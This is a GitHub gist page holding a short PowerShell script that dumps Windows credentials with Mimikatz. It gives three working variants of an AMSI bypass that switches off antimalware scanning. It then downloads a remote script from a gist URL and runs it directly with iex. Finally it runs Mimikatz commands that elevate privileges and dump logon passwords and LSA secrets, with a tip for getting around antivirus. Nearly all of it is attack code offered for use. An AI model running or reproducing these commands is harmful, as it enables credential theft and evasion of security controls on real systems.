Forked from pich4ya/Invoke-OneShot-Mimikatz.ps1
Last active
February 10, 2023 12:46
-
-
Save roflsandwich/4bfa205c30dbef08e555781917bace7b to your computer and use it in GitHub Desktop.
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Obfuscate the AMSI bypass | |
| #Powershell ISE > Start-Steroids | |
| [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) | |
| #If Obfuscation is not working with steroids, split all string! | |
| [Ref].Assembly.GetType('System.Management.Automation.Am'+'siU'+'tils').GetField('am'+'siIn'+'itFai'+'led','NonPublic,Static').SetValue($null,$true) | |
| #New Obfuscated method 2023 | |
| $a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true) | |
| # nishang - 2.2.0 (Jul 24, 2021) | |
| # Change this to "attacker-local-ip" for internal sources | |
| wget('https://gist.githubusercontent.com/pich4ya/144d32262861b573279d15e653c4e08d/raw/6f019c4e2f1f62ffc0754d01dff745d3cec62057/Invoke-SoHighSoHigh.ps1') -UseBasicParsing|iex | |
| Invoke-SoHighSoHigh -Command '"privilege::debug" "token::elevate" "sekurlsa::logonPasswords full" "lsadump::secrets"' | |
| #If antivirus autocloses CMD after mimikatz run you can add | Out-File C:\mimz.txt |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment